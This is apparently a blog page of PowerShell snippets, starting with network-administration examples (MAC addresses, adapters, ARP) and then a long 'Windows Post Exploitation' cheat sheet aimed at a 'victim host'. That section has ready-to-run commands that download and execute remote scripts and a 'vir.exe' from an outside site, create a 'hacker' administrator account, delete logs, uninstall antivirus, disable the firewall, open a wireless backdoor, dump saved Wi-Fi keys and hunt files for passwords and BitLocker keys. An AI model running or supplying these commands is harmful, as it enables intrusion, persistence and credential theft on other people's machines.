Agrupar por direcciones MAC con PowerShell
1 | Get-NetNeighbor | Group-Object LinkLayerAddress |
9. Gestión de la red en PowerShell (nivel intermedio)
Relación de las capas del modelo TCP/IP con PowerShell: Capa física La capa de red física especifica las características del hardware que se utilizará para la red. Por ejemplo, la capa de red física especifica las características físicas del medio de comunicaciones. La capa física de TCP/IP describe por ejemplo los estándares de hardware como IEEE 802.3 y la especificación del medio de red Ethernet. La capa física se refiere a las transformaciones que se le hacen a la secuencia de bits para trasmitirlos de un lugar a otro, los bits se manejan dentro del equipo como niveles eléctricos. Por […]
Convertir a binario las direcciones MAC de todos los dispositivos de red que hay en una red
1 2 3 4 5 6 7 | ForEach($val in ((Get-NetNeighbor).LinkLayerAddress).replace("-","")) { $val 0..($val.Length-1) | %{ Write-Host $val[$_],([Convert]::ToString([Byte]::Parse($val[$_],[System.Globalization.NumberStyles]::HexNumber),2)) } } |
9. Gestión de la red en PowerShell para administradores de sistemas (nivel básico)
Relación de las capas de red con cmdlets de PowerShell. Capa física Relación con el medio físico, información sobre las tarjetas de interfaz de red Ethernet. Obtener información sobre los interfaces físicos
1 2 | Get-NetAdapterHardwareInfo Get-NetAdapter -Physical |
Estadísticas de la red
1 | Get-NetAdapterStatistics |
Capa de enlace de datos Los datos se organizan en tramas, en esta capa se pueden detectar errores. Un protocolo de la capa de enlace es ARP que es responsable de encontrar la dirección de hardware (Ethernet MAC) que corresponde a una determinada dirección IP. Obtener información sobre las direcciones físicas
1 2 | Get-NetAdapter | Select-Object Name,MacAddress Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Select-Object Description,MACAddress |
Direcciones físicas asociadas
1 | Get-NetNeighbor |
Capa de Internet La dirección IP se encarga […]
Windows Post Exploitation Cmdlets Execution (PowerShell)
Presence This section focuses on information gathering about the victim host and the network that it’s attached to. System
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 | #Shows all current environmental variables $env:ALLUSERSPROFILE $env:APPDATA $env:CommonProgramFiles ${env:CommonProgramFiles(x86)} $env:CommonProgramW6432 $env:COMPUTERNAME $env:ComSpec $env:FP_NO_HOST_CHECK $env:HOMEDRIVE $env:HOMEPATH $env:LOCALAPPDATA $env:LOGONSERVER $env:NUMBER_OF_PROCESSORS $env:OS $env:Path $env:PATHEXT $env:PROCESSOR_ARCHITECTURE $env:PROCESSOR_IDENTIFIER $env:PROCESSOR_LEVEL $env:PROCESSOR_REVISION $env:ProgramData $env:ProgramFiles ${env:ProgramFiles(x86)} $env:ProgramW6432 $env:PSModulePath $env:PUBLIC $env:SESSIONNAME $env:SystemRoot $env:TEMP $env:TMP $env:USERDOMAIN $env:USERDOMAIN_ROAMINGPROFILE $env:USERNAME $env:USERPROFILE $env:SystemDrive $env:windir #Shows all current environmental variables (macOS) $env:_ $env:LOGNAME $env:SHLVL $env:TERM_SESSION_ID $env:PATHEXT $env:__CF_USER_TEXT_ENCODING $env:PATH $env:SSH_AUTH_SOCK $env:TMPDIR $env:Apple_PubSub_Socket_Render $env:PSMODULEPATH $env:TERM $env:USER $env:HOME $env:PWD $env:TERM_PROGRAM $env:XPC_FLAGS $env:LC_CTYPE $env:SHELL $env:TERM_PROGRAM_VERSION $env:XPC_SERVICE_NAME #Information about disk Get-Disk #Retrieving Process Information Get-Process | Select-Object Name,Path,Company,CPU,Product,TotalProcessorTime,StartTime #Lists running threads for a specified process (Get-Process chrome | Select-Object Threads).Threads Get-Process | select -expand Threads #Last Boot Uptime Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime #Lists the current drivers on the system Get-Process -Module #Events and event logs on the local and remote Get-EventLog -LogName System -EntryType Error, Warning Get-EventLog -LogName System -EntryType Error, Warning -ComputerName $computer |
WMI
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 | #Information about disk Get-WmiObject -Class win32_DiskDrive #Retrieving the Shared Resources on the Local Computer Get-WmiObject -Class Win32_Share #Retrieving the Shared Resources on a Remote Computer Get-WmiObject -Class Win32_Share -ComputerName COMPUTER #Remote information Get-WmiObject Win32_ComputerSystem -cn $computer Get-WmiObject Win32_Group -cn $computer Get-WmiObject Win32_LogicalDisk -cn $computer Get-WmiObject Win32_NetworkClient -cn $computer Get-WmiObject Win32_NetworkConnection -cn $computer Get-WmiObject Win32_NetworkLoginProfile -cn $computer Get-WmiObject Win32_NTLogEvent -cn $computer Get-WmiObject Win32_OperatingSystem -cn $computer Get-WmiObject Win32_Process -cn $computer Get-WmiObject Win32_Product -cn $computer Get-WmiObject Win32_QuickFixEngineering -cn $computer Get-WmiObject Win32_Service -cn $computer Get-WmiObject Win32_Share -cn $computer Get-WmiObject Win32_StartupCommand -cn $computer Get-WmiObject Win32_UserAccount -cn $computer Get-WmiObject Win32_Volume -cn $computer #Remote information (use credential) $credenciales=Get-Credential (Get-WmiObject Win32_AutochkSetting -ComputerName ('192.168.1.'+$_) -Credential $credenciales).SettingID (Get-WmiObject Win32_BaseBoard -ComputerName ('192.168.1.'+$_) -Credential $credenciales).Manufacturer (Get-WmiObject Win32_BIOS -ComputerName ('192.168.1.'+$_) -Credential $credenciales).Version (Get-WmiObject Win32_Bus -ComputerName ('192.168.1.'+$_) -Credential $credenciales).DeviceID Get-WmiObject Win32_Processor -ComputerName ('192.168.1.'+$_) -Credential $credenciales Get-WmiObject Win32_SystemEnclosure -ComputerName ('192.168.1.'+$_) -Credential $credenciales Get-WmiObject Win32_Battery -ComputerName ('192.168.1.'+$_) -Credential $credenciales Get-WmiObject Win32_Printer -ComputerName ('192.168.1.'+$_) -Credential $credenciales #WMI queries $query="Select * from Msft_CliAlias"; Get-WMIObject -Query $query $query="Select * from Win32_BaseBoard"; Get-WMIObject -Query $query $query="Select * from Win32_BIOS"; Get-WMIObject -Query $query $query="Select * from Win32_BootConfiguration"; Get-WMIObject -Query $query $query="Select * from Win32_CDROMDrive"; Get-WMIObject -Query $query $query="Select * from Win32_ComputerSystem"; Get-WMIObject -Query $query $query="Select * from WIN32_PROCESSOR"; Get-WMIObject -Query $query $query="Select * from Win32_ComputerSystemProduct"; Get-WMIObject -Query $query $query="Select * from CIM_DataFile"; Get-WMIObject -Query $query $query="Select * from WIN32_DCOMApplication"; Get-WMIObject -Query $query $query="Select * from WIN32_DESKTOP"; Get-WMIObject -Query $query $query="Select * from WIN32_DESKTOPMONITOR"; Get-WMIObject -Query $query $query="Select * from Win32_DeviceMemoryAddress"; Get-WMIObject -Query $query $query="Select * from Win32_DiskDrive"; Get-WMIObject -Query $query $query="Select * from Win32_DiskQuota"; Get-WMIObject -Query $query $query="Select * from Win32_DMAChannel"; Get-WMIObject -Query $query $query="Select * from Win32_Environment"; Get-WMIObject -Query $query $query="Select * from Win32_Directory"; Get-WMIObject -Query $query $query="Select * from Win32_Group"; Get-WMIObject -Query $query $query="Select * from Win32_IDEController"; Get-WMIObject -Query $query $query="Select * from Win32_IRQResource"; Get-WMIObject -Query $query $query="Select * from Win32_ScheduledJob"; Get-WMIObject -Query $query $query="Select * from Win32_LoadOrderGroup"; Get-WMIObject -Query $query $query="Select * from Win32_LogicalDisk"; Get-WMIObject -Query $query $query="Select * from Win32_LogonSession"; Get-WMIObject -Query $query $query="Select * from WIN32_CACHEMEMORY"; Get-WMIObject -Query $query $query="Select * from Win32_PhysicalMemory"; Get-WMIObject -Query $query $query="Select * from Win32_PhysicalMemoryArray"; Get-WMIObject -Query $query $query="Select * from WIN32_NetworkClient"; Get-WMIObject -Query $query $query="Select * from Win32_NetworkLoginProfile"; Get-WMIObject -Query $query $query="Select * from Win32_NetworkProtocol"; Get-WMIObject -Query $query $query="Select * from Win32_NetworkConnection"; Get-WMIObject -Query $query $query="Select * from Win32_NetworkAdapter"; Get-WMIObject -Query $query $query="Select * from Win32_NetworkAdapterConfiguration"; Get-WMIObject -Query $query $query="Select * from Win32_NTDomain"; Get-WMIObject -Query $query $query="Select * from Win32_NTLogEvent"; Get-WMIObject -Query $query $query="Select * from Win32_NTEventlogFile"; Get-WMIObject -Query $query $query="Select * from Win32_OnBoardDevice"; Get-WMIObject -Query $query $query="Select * from Win32_OperatingSystem"; Get-WMIObject -Query $query $query="Select * from Win32_PageFileUsage"; Get-WMIObject -Query $query $query="Select * from Win32_PageFileSetting"; Get-WMIObject -Query $query $query="Select * from Win32_DiskPartition"; Get-WMIObject -Query $query $query="Select * from Win32_PortResource"; Get-WMIObject -Query $query $query="Select * from Win32_PortConnector"; Get-WMIObject -Query $query $query="Select * from Win32_Printer"; Get-WMIObject -Query $query $query="Select * from Win32_PrinterConfiguration"; Get-WMIObject -Query $query $query="Select * from Win32_PrintJob"; Get-WMIObject -Query $query $query="Select * from Win32_Process"; Get-WMIObject -Query $query $query="Select * from Win32_Product"; Get-WMIObject -Query $query $query="Select * from Win32_QuickFixEngineering"; Get-WMIObject -Query $query $query="Select * from Win32_QuotaSetting"; Get-WMIObject -Query $query $query="Select * from Win32_TSAccount"; Get-WMIObject -Query $query $query="Select * from Win32_TSNetworkAdapterSetting"; Get-WMIObject -Query $query $query="Select * from Win32_TSPermissionsSetting"; Get-WMIObject -Query $query $query="Select * from Win32_TerminalServiceSetting"; Get-WMIObject -Query $query $query="Select * from Win32_OSRecoveryConfiguration"; Get-WMIObject -Query $query $query="Select * from Win32_Registry"; Get-WMIObject -Query $query $query="Select * from Win32_SCSIController"; Get-WMIObject -Query $query $query="Select * from Win32_PerfRawData_PerfNet_Server"; Get-WMIObject -Query $query $query="Select * from Win32_Service"; Get-WMIObject -Query $query $query="Select * from Win32_ShadowCopy"; Get-WMIObject -Query $query $query="Select * from Win32_ShadowStorage"; Get-WMIObject -Query $query $query="Select * from Win32_Share"; Get-WMIObject -Query $query $query="Select * from Win32_SoftwareElement"; Get-WMIObject -Query $query $query="Select * from Win32_SoftwareFeature"; Get-WMIObject -Query $query $query="Select * from WIN32_SoundDevice"; Get-WMIObject -Query $query $query="Select * from Win32_StartupCommand"; Get-WMIObject -Query $query $query="Select * from Win32_SystemAccount"; Get-WMIObject -Query $query $query="Select * from Win32_SystemDriver"; Get-WMIObject -Query $query $query="Select * from Win32_SystemEnclosure"; Get-WMIObject -Query $query $query="Select * from Win32_SystemSlot"; Get-WMIObject -Query $query $query="Select * from Win32_TapeDrive"; Get-WMIObject -Query $query $query="Select * from Win32_TemperatureProbe"; Get-WMIObject -Query $query $query="Select * from Win32_TimeZone"; Get-WMIObject -Query $query $query="Select * from Win32_UninterruptiblePowerSupply"; Get-WMIObject -Query $query $query="Select * from Win32_UserAccount"; Get-WMIObject -Query $query $query="Select * from Win32_VoltageProbe"; Get-WMIObject -Query $query $query="Select * from Win32_Volume"; Get-WMIObject -Query $query $query="Select * from Win32_VolumeQuotaSetting"; Get-WMIObject -Query $query $query="Select * from Win32_VolumeUserQuota"; Get-WMIObject -Query $query $query="Select * from Win32_WMISetting"; Get-WMIObject -Query $query |
Networking
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 | #Network Adaptor information contains, manufacturer, MAC ID etc Get-WmiObject -Class win32_networkadapter #Hardware information of the network adapter Get-NetAdapterHardwareInfo #Returns all physical network adapters Get-NetAdapter -Physical #Networking statistics from the network adapter. The statistics include broadcast, multicast, discards, and errors Get-NetAdapterStatistics #Get the current MAC Get-NetAdapter | Select-Object Name,MacAddress Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Select-Object Description,MACAddress #Neighbor cache entries (The neighbor cache maintains information for each on-link neighbor, including the IP address and the associated link-layer address. In IPv4, the neighbor cache is commonly known as the Address Resolution Protocol (ARP) cache) Get-NetNeighbor #Get the current IP address Get-NetIPAddress | Select-Object InterfaceAlias,IPAddress Get-NetIPAddress -AddressFamily ipv4 Get-NetIPAddress -AddressFamily ipv6 Get-NetIPConfiguration #Information about firewall Get-NetFirewallAddressFilter Get-NetFirewallApplicationFilter Get-NetFirewallInterfaceFilter Get-NetFirewallInterfaceTypeFilter Get-NetFirewallPortFilter Get-NetFirewallProfile Get-NetFirewallRule Get-NetFirewallSecurityFilter Get-NetFirewallServiceFilter Get-NetFirewallSetting #List Firewall Rules #Direction: Inbound Get-NetFirewallRule | Where {$_.Direction –eq ‘Inbound’} #TCP Get-NetTCPConnection Get-NetTCPConnection | Select-Object LocalPort,Remoteport #UDP Get-NetUDPEndpoint (Get-NetUDPEndpoint).LocalPort #Information about DNS Get-DnsClient Get-DnsClientCache Get-DnsClientGlobalSetting Get-DnsClientNrptGlobal Get-DnsClientNrptPolicy Get-DnsClientNrptRule Get-DnsClientServerAddress #Displays your currently shared SMB entries Get-SmbShare Get-WmiObject -Class Win32_Share #Access a Router $user="admin" $pass="admin123" $pair="${user}:${pass}" $bytes=[System.Text.Encoding]::ASCII.GetBytes($pair) $base64=[System.Convert]::ToBase64String($bytes) $basicAuthValue="Basic $base64" $headers=@{Authorization=$basicAuthValue} $url='https://192.168.1.1:89/rpSys.html' $result=(Invoke-WebRequest -Uri $url -Headers $headers) ($result.AllElements | Where tagName -eq “title”).outerText #Connect to Access Point $user="admin" $pass="1234" $pair="${user}:${pass}" $bytes=[System.Text.Encoding]::ASCII.GetBytes($pair) $base64=[System.Convert]::ToBase64String($bytes) $basicAuthValue="Basic $base64" $headers=@{Authorization=$basicAuthValue} $url='https://192.168.1.2/index.asp' $result=(Invoke-WebRequest -Uri $url -Headers $headers) ($result.AllElements | Where tagName -eq “title”).outerText |
Users
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | #List your current user [System.Security.Principal.WindowsIdentity]::GetCurrent() ([System.Security.Principal.WindowsIdentity]::GetCurrent()).name #Remote user Get-WmiObject win32_computersystem -property username -ComputerName RemoteComputer #List local users $adsi = [ADSI]"WinNT://$env:COMPUTERNAME" $adsi.Children | Where-Object {$_.SchemaClassName -eq 'user'} | Select-Object Name #List local groups $adsi = [ADSI]"WinNT://$env:COMPUTERNAME" $adsi.Children | Where-Object {$_.SchemaClassName -eq 'group'} | Select-Object name #Information about user accounts Get-WmiObject -Class Win32_UserAccount Get-WmiObject -Class Win32_Account #Information about group accounts Get-WmiObject -Class Win32_Group |
Configs
1 2 3 4 5 | #Services Get-Service #Print the contents of the Windows hosts file Get-Content $env:windir\System32\drivers\etc\hosts |
Finding important files
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | #Gets the items in one or more specified locations Get-ChildItem #Recursively searches for files with a “.txt” extension in the C:\temp directory. The contents of any files matching this criteria are then searched for the term “password” Get-ChildItem c:\temp -Filter *.txt -Recurse | Select-String password #Searching file “TeamViewer” Get-ChildItem c:\ -rec -ea SilentlyContinue | ForEach-Object { Select-String "TeamViewer" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches } #Searching IP adresses in text files Write-Host "IP addresses:`n" Get-ChildItem C:\Users\ -rec -ea SilentlyContinue | ForEach-Object { Select-String "\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches | ForEach-Object {($_.matches)|Select-Object Value} } #Searching BitLocker recovery keys #Searching content “Clave de recuperación de Cifrado de unidad BitLocker” Get-ChildItem C:\Users\juan -rec -ea SilentlyContinue | ForEach-Object { Select-String "Clave de recuperación de Cifrado de unidad BitLocker" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches } |
Files to pull
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | #Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size Get-ChildItem $env:SystemDrive\pagefile.sys #Prefetch files Get-ChildItem $env:SystemRoot\Prefetch #Portion of accessed file list within prefetch file for PowerShell.exe Get-Content $env:SystemRoot\Prefetch\POWERSHELL_ISE.EXE-85BC6AB4.pf #File contains the registry settings Get-ChildItem $env:windir\System32\config -Force #File contains the registry settings for their individual account Get-ChildItem $env:USERPROFILE\NTUSER.DAT #This file contains the mappings of IP addresses to host names Get-ChildItem $env:windir\System32\drivers\etc\hosts Get-Content $env:windir\System32\drivers\etc\hosts |
Remote system access
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | #Determines whether all elements of the path exist Test-Path \\192.168.1.56\datos #Gets the items in one or more specified locations Get-ChildItem \\192.168.1.56\datos #Creates a new Server Message Block (SMB) share New-SmbShare -Name fso -Path F:\power #Creates a new Server Message Block share and add permissions New-SmbShare -Name fso -Path F:\power –FullAccess administrador -ReadAccess Everyone #Enable remote desktop powershell Start-Process powershell_ise -Verb runAs Set-Location HKLM:\ $RegKey ='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\' Set-ItemProperty -Path $RegKey -Name fDenyTSConnections -Value 0 #View installed programs on remote machine $credencial=Get-Credential 1..254 | %{ ('192.168.1.'+$_) if(Test-Connection ('192.168.1.'+$_) -Quiet) { Get-WmiObject -Class Win32_Product -ComputerName ('192.168.1.'+$_) -Credential $credencial } } |
Software
1 2 3 4 5 | #Gets a list of the app packages that are installed in a user profile Get-AppxPackage #Returns a list of all software packages that have been installed by using Package Management Get-Package |
AutoStart directories
1 | Get-ChildItem $env:SystemDrive\'ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\' -Force |
Persistance This section focuses on gaining a foothold to regain, or reobtain access to a system through means of authentication, backdoors, etc.. Download
1 2 | #Transfer one or more files between a client computer and a server Start-BitsTransfer https://www.jesusninoc.com/vir.exe |
Compress or expand ZIP archive
1 2 3 4 5 | #Creates a new zipped (or compressed) archive file from one or more specified files or folders Compress-Archive -LiteralPath C:\powershell\example.txt –CompressionLevel Optimal -DestinationPath C:\powershell\comprimido.zip #Extracts files from a specified archive (zipped) file Expand-Archive -LiteralPath C:\powershell\comprimido.zip -DestinationPath C:\powershell\descomprimir |
Reg command exit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | #List Set-Location HKLM:\ Get-ChildItem #PowerShell execution policy Set-Location HKLM:\ Set-Location \SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ Get-ChildItem #Searching the registry “TeamViewer” Get-ChildItem HKCU:\ -rec -ea SilentlyContinue | ForEach-Object { Select-String "TeamViewer" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches #Searching the registry: URL Get-ChildItem HKCU:\ -rec -ea SilentlyContinue | ForEach-Object { Select-String "\b(ht|f)tp(s?)[^ ]*\.[^ ]*(\/[^ ]*)*\b" -input (Get-ItemProperty -Path $_.PsPath) -AllMatches | ForEach-Object {($_.matches)|Select-Object Value} } |
Deleting logs
1 | Remove-Item $env:windir\*.log |
Uninstalling software “Antivirus”
1 | Uninstall-Package |
Invasive or altering commands
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 | #Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’ $ComputerName = $env:COMPUTERNAME $computer = [ADSI]"WinNT://$($ComputerName),computer" $Name = 'hacker' $user = $computer.Create('User', "$($Name)") $password = 'hacker' $user.SetPassword($password) $user.SetInfo() #Creates a new group $ComputerName = $env:COMPUTERNAME $computer = [ADSI]"WinNT://$($ComputerName),computer" $Name = 'hackers' $user = $computer.Create('Group', "$($Name)") $user.SetInfo() #Add a user to a group $ComputerName = $env:COMPUTERNAME $nombregrupo='administradores' $group = [ADSI]"WinNT://$($Computername)/$($nombregrupo),group" $user = 'hacker' $group.add("WinNT://$($user),user") #Registers a scheduled task definition on a local computer Register-ScheduledTask Task01 -Action (New-ScheduledTaskAction -Execute "Cmd") -Principal (New-ScheduledTaskPrincipal -GroupId "BUILTIN\administradores" -RunLevel Highest) -Settings (New-ScheduledTaskSettingsSet -RestartCount 5 -RestartInterval 60) #Creates a new Server Message Block (SMB) share New-SmbShare -Name fso -Path F:\power #Creates a new Server Message Block share and add permissions New-SmbShare -Name fso -Path F:\power –FullAccess administrador -ReadAccess Everyone #Modify hosts file Get-Content $env:windir\System32\drivers\etc\hosts Add-Content $env:windir\System32\drivers\etc\hosts "127.0.0.1 jesusninoc.com" #Download and execute a remote script powershell Start-BitsTransfer -Source 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' -Destination $env:TEMP\config.ps1; powershell -File $env:TEMP\config.ps1 #Download and execute a remote script (No changes the user preference for the Windows PowerShell execution policy) powershell Start-Process powershell_ise -Verb runAs $script=Invoke-WebRequest 'https://www.jesusninoc.com/wp-content/uploads/2014/12/config.txt' Invoke-Expression $script #Proxy configuration netsh winhttp import proxy source=ie #Disable the Microsoft Windows Firewall netsh advfirewall set allprofiles state off #Creating a wireless backdoor netsh wlan set host mode=allow ssid=WLAN_AA key=123ASBB@@ netsh wlan start host #Wireless password (netsh wlan show profile | Select-String "Perfil de todos los usuarios") | %{ [String]$SSID=$_ $SSID=$SSID.Split(":")[1].trim() $SSID netsh wlan show profile name=$SSID key=clear | Select-String 'Contenido de la clave' } |
Buscar direcciones IP en la red local y realizar una consulta DNS
1 2 3 | (Get-NetNeighbor).IPAddress | Select-String "192.168.1." | % { Resolve-DnsName $_ } |
Buscar direcciones IP en la red local y realizar una consulta WMI
1 2 3 4 | $credencial=Get-Credential (Get-NetNeighbor).IPAddress | Select-String "192.168.1." | % { Get-WmiObject -Class Win32_BIOS -ComputerName ($_) -Credential $credencial } |